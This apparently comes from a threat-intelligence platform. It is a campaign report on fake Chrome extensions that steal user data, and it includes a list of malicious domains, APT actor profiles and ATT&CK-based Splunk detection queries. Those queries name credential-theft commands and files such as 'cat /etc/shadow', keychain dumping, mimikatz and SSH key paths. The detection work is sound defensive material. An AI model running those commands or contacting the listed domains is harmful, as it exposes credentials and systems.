Campaigns
Stealthy Chrome Extensions Exploit Trusted Brands to Exfiltrate User Data

Stealthy Chrome Extensions Exploit Trusted Brands to Exfiltrate User Data

ChromeMalwareFakeChromeAddonsStealthMalware
A new cyber campaign uses fake Chrome extensions to mimic trusted brands. These tools secretly collect personal data from users. They abuse trust and everyday online behavior. This shows the urgent need for human-focused cybersecurity.

Indicators of Compromise

cryptowhalesvision.world
glimmerbloop.top
api.zorpleflux.top
spaceball.top
snogglewomp.top
workfront.plus.com
infosync.top
siteanalyzer.world
quirkleblip.top
web.analytics.top
iron.tunnel.com
twizzleflap.top
whale.alerts.org
api.glimmerbloop.top
ioonline.top
lockads.org
squirrel.wallet.world
wobblefizz.top
soul.vpn.com
flibberwump.top
sitestats.world
quizzlepuff.top
floopdoodle.top
creativehunter.world
noodlequack.top
e.xt.top
blurflewhack.top
iochange.top
youtube.vision.com
webinsight.world
adelephant.world
web.metrics.link
fortivnp.com
ioapp.sbs
calendlydocker.com
datazen.sbs
ad.eye.help
madgicxads.world
similar.net.com
manusai.sbs
snickerdoodle.top
youtube.vision.world
debank.click
iohub.sbs
earthvpn.top
fizzlepopcorn.top
meta.spy.help
am.sector.world
ad.vision.click
ad.spy.world
amlsector.com
debank.extension.world
raccoon.vpn.world
digigtalwow.top
adtwin.world
iospace.top
jibberjot.top
twin.web.world
irontunnel.world
ad.guardian.world
wti.analytics.com
ad.seeker.world
wobbleguff.top
x-theme.world
eventphere.com
whale.alert.life
spylens.world
crypto.whale.top
wibblywob.top
datavibe.sbs
zorpleflux.top
api.sprocketwhirl.top
infograph.top
meta.guests.com
flight.radar.life
safesurf.world
cookie.whitelist.com
wtigroups.com
madgicx.plus.com
orchid.vpn.com
calendlydaily.world
ad.vision.top
digigtalneo.top
analytics.box.world
infonet.sbs
jumblefizz.top
privacy.shield.world
debank.sbs
deepseek-ai.link
meta.spy365.com
forti.vpn.com
webwatch.world
sprocketwhirl.top
creativepeek.world
crypto.whale.info
calendly.director.com
zingleflap.top
addetective.world
api.infograph.top
ad.scope.world

APT Groups2

APT 5

<p><b>Summary of Actor</b>:APT 5 is a sophisticated cyber espionage group widely believed to operate with nation-state backing. They primarily focus on aerospace and defense industries. The group has been known for their stealthy attack techniques and sustained campaigns.</p><p><b>General Features</b>:APT 5 is known for persisting in their attacks over long periods and using advanced malware and zero-day exploits. They often customize their tools for specific targets and employ spear-phishing and strategic web compromises as initial infection vectors.</p><p><b>Related Other Groups</b>: APT 3,APT 10,APT 29</p><p><b>Indicators of Attack (IoA)</b>:<ul><li>Use of custom malware</li><li>Spear-phishing emails</li><li>Strategic web compromises</li><li>Zero-day exploits</li></ul></p><p><b>Recent Activities and Trends</b>:<ul><li><b>Latest Campaigns </b>: APT 5 has been linked to recent cyber-espionage campaigns targeting government institutions and defense contractors in North America and Europe.</li><li><b>Emerging Trends </b>: There has been an observed increase in the use of supply chain attacks and targeting of IT service providers to reach their ultimate targets. The group has also been incorporating more advanced evasion techniques in their malware.</li></ul></p>

APT 5ManganeseMulberry TyphoonTG-2754Bronze FleetwoodTEMP.BottleKeyhole PandaPoisoned Flight
APT IranIran

Overview :&nbsp;&lt;br&gt;APT Iran refers to a collection of threat actors suspected to operate under Iranian state interests. These actors conduct cyberespionage, sabotage, and information operations against regional and global targets.&lt;br&gt;&lt;div&gt;Key Characteristics :&lt;br&gt;- State-sponsored and geopolitically motivated&lt;br&gt;- Notable groups: APT33, APT34 (OilRig), APT35 (Charming Kitten), APT39&lt;br&gt;- Operations span surveillance, disinformation, and destructive attacks&lt;br&gt;&lt;div&gt;Indicators of Attack (IoA) :&lt;/div&gt;&lt;/div&gt;- Use of credential harvesting pages and spearphishing&lt;br&gt;- C2 over HTTPS and DNS&lt;br&gt;- Tools include PowerShell-based backdoors and wipers&lt;br&gt;&lt;div&gt;Recent Activities and Trends :&lt;/div&gt;- Targeting Israeli and U.S. critical infrastructure&lt;br&gt;- Use of new malware families (e.g. POWERSTAR, SHARPSTATS)&lt;br&gt;- Blending hacktivism with state-sponsored capabilities&lt;/div&gt;

EUROPIUMHazel SandstormUNC788Yellow MaeroTunnelVisionTimberwormCrambusG0049TA452Magic HoundAgent SerpensPhosphorusCharming KittenEvasive SerpensUNC1860Tarh AndishanAPT 35Ballistic BobcatCharmingCypressEducated ManticoreITG13Scarred ManticoreCobalt MirageIRN2Cobalt IllusionOilRigYellow GarudaMint SandstormChryseneHelix KittenAPT 34Earth SimnavazGreenbugDEV-0861ATK 40TEMP.BeanieTA453Twisted KittenStorm-0861Cobalt Gypsy

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1113 - Screen Capture


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.

DS0009

Process

OS API Execution

Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as CopyFromScreen, xwd, or screencapture.[1][2]. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.


T1033 - System Owner/User Discovery


ID

Data Source

Data Component

Detects

DS0026

Active Directory

Active Directory Object Access

Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. [240] [241] [242] Note: Domain controllers may not log replication requests originating from the default domain controller account. [243]. Monitor for replication requests [244] from IPs not associated with known domain controllers. [245]

DS0017

Command

Command Execution

Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command-lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, [246] which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of CMSTP.

DS0022

File

File Access

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols.



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

DS0009

Process

OS API Execution

Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.



Process Access

Monitor for unexpected processes interacting with lsass.exe.[247] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.

Linux

To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/<pid>/maps, where the <pid> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.



Process Creation

Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of at being created, therefore implying the querying or creation of tasks. If this tools is commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning.

Analytic 1 - Suspicious Process Execution

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND Image="*at.exe"

DS0024

Windows Registry

Windows Registry Key Access

Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.


T1114 - Email Collection


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.[12] High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.

DS0017

Command

Command Execution

Monitor executed processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

On Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule, Set-InboxRule, New-TransportRule, and Set-TransportRule PowerShell cmdlets.[13][14]

DS0022

File

File Access

Monitor for unusual processes access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.

DS0028

Logon Session

Logon Session Creation

Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.


T1119 - Automated Collection


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for actions that could be taken to collect internal data.

DS0022

File

File Access

Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

DS0002

User Account

User Account Authentication

Monitor Azure AD (Entra ID) Sign In logs for suspicious Applications authenticating to the Graph API or other sensitive Resources using User Agents attributed to scripting interpreters such as python or Powershell.

Analytic 1 - Suspicious applications, unusual user agents (e.g., python, PowerShell), anomalous IP addresses, and unmanaged devices

index="azure_ad_signin_logs" Operation="UserLogin"| search UserAgent="python" OR UserAgent="PowerShell"| stats count by ClientIP, UserId, DeviceProperties| where ClientIP!="expected_ip" OR DeviceProperties!="expected_properties"


T1082 - System Information Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor discovery commands in the /var/log/shell.log history file.

DS0009

Process

OS API Execution

Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.



Process Creation

Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.


T1071 - Application Layer Protocol


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).



Network Traffic Flow

Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).


T1176 - Browser Extensions


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for usage of the profiles tool, such as profiles install -type=configuration.

Analytic 1 - Look for command-line activity tied to mobileconfig or extension deployment

sourctype=WinEventLog:Sysmon EventCode=1(CommandLine="profiles install" OR CommandLine=".mobileconfig" OR CommandLine="chrome-extension")| stats count by CommandLine, Image, ParentImage, User, Computer, _time| sort -_time

DS0022

File

File Creation

Monitor for - Newly written .crx, .xpi, or .mobileconfig files- Modified .plist files under /Library/Managed Preferences// (macOS)- Creation of extensions under: - Chrome: AppData\Local\Google\Chrome\User Data\Default\Extensions - Firefox: %APPDATA%\Mozilla\Firefox\Profiles*.default\extensions

Analytic 1 - Detect newly written config files

sourcetype=WinEventLog:Sysmon EventCode=11(TargetFilename="\Extensions\" OR TargetFilename=".crx" OR TargetFilename=".xpi" OR TargetFilename="*.mobileconfig")| stats count by TargetFilename, Image, User, Computer, _time| sort -_time

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

DS0009

Process

Process Creation

Monitor for execution of chrome.exe, firefox.exe, or edge.exe with arguments like --load-extension, --pack-extension, or --disable-extensions-file-access-check.Monitor unexpected command-line installs or dev mode extensions

Analytic 1 - browser execution

sourcetype=WinEventLog:Sysmon EventCode=1(CommandLine="--load-extension" OR CommandLine="--pack-extension")| stats count by Image, CommandLine, User, host, _time| sort -_time

DS0024

Windows Registry

Windows Registry Key Creation

Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.

Chrome extension registry keys under: HKCU\Software\Google\Chrome\ExtensionsFirefox entries under: HKCU\Software\Mozilla\Firefox\ExtensionsUnexpected changes or new GUIDs

Analytic 1 - browser registry keys created

sourcetype=WinEventLog:Sysmon EventCode=13(TargetObject="\Software\Google\Chrome\Extensions\" OR TargetObject="\Software\Mozilla\Firefox\Extensions\")| stats count by TargetObject, Details, User, Computer, _time| sort -_time


T1140 - Deobfuscate/Decode Files or Information


ID

Data Source

Data Component

Detects

DS0022

File

File Modification

Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn’t be further modified) that may coincide with attempts to hide artifacts.

DS0009

Process

Process Creation

Monitor for newly executed processes that attempt to hide artifacts of an intrusion, such as common archive file applications and extensions (ex: Zip and RAR archive tools), and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.

CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.

Analytic Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The analytic is oriented around the creation of CertUtil.exe processes, which may be used to encode and decode files, including PE and script code. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process.

Analytic 1 - CertUtil with Decode Argument

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="C:\Windows\System32\certutil.exe" AND CommandLine= decode )

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.


T1555 - Credentials from Password Stores


ID

Data Source

Data Component

Detects

DS0025

Cloud Service

Cloud Service Enumeration

Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from cloud secrets managers, such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure. Alert on any suspicious usages of these commands, such as an account or service generating an unusually high number of secret requests.

Analytic 1 - High volume of secret requests from unusual accounts or services.

index=security sourcetype IN ("aws:cloudtrail", "azure:activity", "gcp:activity")(eventName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") ORoperationName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") ORprotoPayload.methodName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys"))

DS0017

Command

Command Execution

Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials.

Analytic 1 - Commands indicating credential searches.

(index=os sourcetype IN ("Powershell", "linux_secure", "macos_secure") CommandLine IN ("findstr /si password", "findstr /si pass", "grep -r password", "grep -r pass", "grep -r secret", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L"))

DS0022

File

File Access

Monitor for files being accessed that may search for common password storage locations to obtain user credentials.

Analytic 1 - Unauthorized access to files containing credentials.

index=security sourcetype IN ("WinEventLog:Security", "WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")((sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetObject IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="linux_secure" action="open" filepath IN ("/etc/shadow", "/etc/passwd", "/.aws/credentials", "/.ssh/id_rsa")) OR (sourcetype="macos_secure" event_type="open" file_path IN ("/Library/Keychains/", "/Users//Library/Keychains/", "/Users//.ssh/id_rsa")))

DS0009

Process

OS API Execution

Monitor for API calls that may search for common password storage locations to obtain user credentials.



Process Access

Monitor for processes being accessed that may search for common password storage locations to obtain user credentials.

Analytic 1 - Unauthorized process access indicating credential searches.

index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")(EventCode=10 TargetImage IN ("lsass.exe", "securityd", "ssh-agent", "gpg-agent") OR EventCode=11 TargetObject IN ("password", "creds", "credentials", "secrets", "keychain", ".kdbx", ".pfx", ".pem", ".p12", ".key") OR EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache"))



Process Creation

Monitor newly executed processes that may search for common password storage locations to obtain user credentials.

Analytic 1 - New processes with parameters indicating credential searches.

index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")(EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L"))


T1185 - Browser Session Hijacking


ID

Data Source

Data Component

Detects

DS0028

Logon Session

Logon Session Creation

Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior.

DS0009

Process

Process Access

This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for Process Injection against browser applications.



Process Modification

This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for Process Injection against browser applications.


T1016 - System Network Configuration Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.

DS0009

Process

OS API Execution

Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.



Process Creation

Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses.

Note: The Analytic looks for the creation of ipconfig, route, and nbtstat processes, all of which are system administration utilities that can be used for the purpose of system network configuration discovery. If these tools are commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning.

Analytic 1 - Suspicious Process

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND (Image="C:\Windows\System32\ipconfig.exe" OR Image="C:\Windows\System32\route.exe" OR Image="C:\Windows\System32\nbtstat.exe")

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.


T1059 - Command and Scripting Interpreter


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

Analytic 1 - Suspicious script execution

(sourcetype=WinEventLog:Security OR OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)| search Image IN ("bash", "sh", "cmd", "powershell", "python", "java", "perl", "ruby", "node", "osascript", "wmic")| eval suspicious_cmds=if(like(command_line, "%Invoke-Obfuscation%") OR like(command_line, "%-EncodedCommand%") OR like(command_line, "%IEX%") OR like(command_line, "%wget%") OR like(command_line, "%curl%"), "Yes", "No")

DS0011

Module

Module Load

Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).

Analytic 1 - Look for unusual module loads associated with scripting languages.

sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational| search EventCode=7 ImageLoaded IN ("C:\Windows\System32\JScript.dll", "C:\Windows\System32\vbscript.dll", "System.Management.Automation.dll")

DS0009

Process

Process Creation

Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.

Analytic 1 - Look for unusual command and scripting process creation.

(sourcetype=WinEventLog:Security OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)(EventCode=4688 OR EventID=1 OR _raw=sh OR _raw=python OR _raw=powershell OR _raw=cmd OR _raw=script OR _raw=wscript OR _raw=bash)



Process Metadata

Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[59]

DS0012

Script

Script Execution

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Look for attempts to enable scripts on the system.

index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) (CommandLine="script")| search script_name IN (".ps1", ".sh", ".py", ".rb", ".js", ".vbs")| eval suspicious_script=if(like(script_name, "%.sh") AND hour(_time) NOT BETWEEN 8 AND 18, "Yes", "No")| where suspicious_script="Yes"


T1083 - File and Directory Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. On ESXi servers, monitor for commands that leverage tools like grep and find to search for files with VM extensions such as vmdk, or in VM-related paths such as /vmfs/*.[401][402][403]

DS0009

Process

OS API Execution

Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.



Process Creation

Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.


T1102 - Web Service


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts.



Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).



Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1573 - Encrypted Channel


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).


T1056 - Input Capture


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments associated with modifications to variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

DS0027

Driver

Driver Load

Monitor for unusual kernel driver installation activity.

Analytic 1 - Unexpected kernel driver installations.

index=security sourcetype="WinEventLog:System" EventCode=7045 | where match(Service_Name, "(?i)(keylogger|input|capture|sniff|monitor|keyboard|logger|driver)")

DS0022

File

File Creation

Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux (such as /etc/ld.so.preload) and DYLD_INSERT_LIBRARIES on macOS.



File Modification

Monitor for changes made to files for unexpected modifications to access permissions and attributes. Monitor for changes to files associated with loading shared libraries such as LD_PRELOAD on Linux (such as /etc/ld.so.preload) and DYLD_INSERT_LIBRARIES on macOS.

Analytic 1 - Unexpected file modifications.

index=security sourcetype="WinEventLog:Security" EventCode=4663 | where Object_Type="File" AND Access_Mask IN ("0x2", "0x4", "0x20", "0x80", "0x100")

DS0011

Module

Module Load

Monitor library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.

DS0009

Process

OS API Execution

Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState.[12]



Process Creation

Monitor for newly executed processes conducting malicious activity



Process Metadata

Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.

DS0024

Windows Registry

Windows Registry Key Modification

Monitor for changes made to windows registry keys or values for unexpected modifications


T1012 - Query Registry


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Note: For PowerShell Module logging event id 4103, enable logging for module Microsoft.PowerShell.Management. The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider "Registry"). The the Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.

Analytic 1 - Suspicious Commands

(sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" EventCode="4103") | WHERE CommandLine LIKE "%New-PSDrive%" AND (CommandLine LIKE "%Registry%" OR CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%")

DS0009

Process

OS API Execution

Monitor for API calls (such as RegOpenKeyExA) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. OS API calls associated with querying the Windows Registry are RegOpenKeyEx , RegOpenUserClassesRoot, RegQueryValueExA, and RegQueryValueExW. Execution of these functions might trigger security log ids such as 4663 (Microsoft Security Auditing). Also monitor for RegOpenUserClassesRoot api to retrieve a handle to the HKEY_CLASSES_ROOT key for a specified user. The returned key has a view of the registry that merges the contents of the HKEY_LOCAL_MACHINE\Software\Classes key with the contents of the Software\Classes keys in the user's registry hive.

Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls.



Process Creation

Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Note: The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider "Registry"). The Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.

Note for Analytic 3: Replace FilePathToLolbasProcessXX.exe with lolBAS process names that are used by your organization. The number_standard_deviations parameter should be tuned accordingly. Identifying outliers by comparing distance from a data point to the average value against a certain number of standard deviations is recommended for data values that are symmetrical distributed. If your data is not distributed, try a different algorithm such as the Interquartile Range (IQR).

Analytic 1 - Suspicious Processes with Registry keys

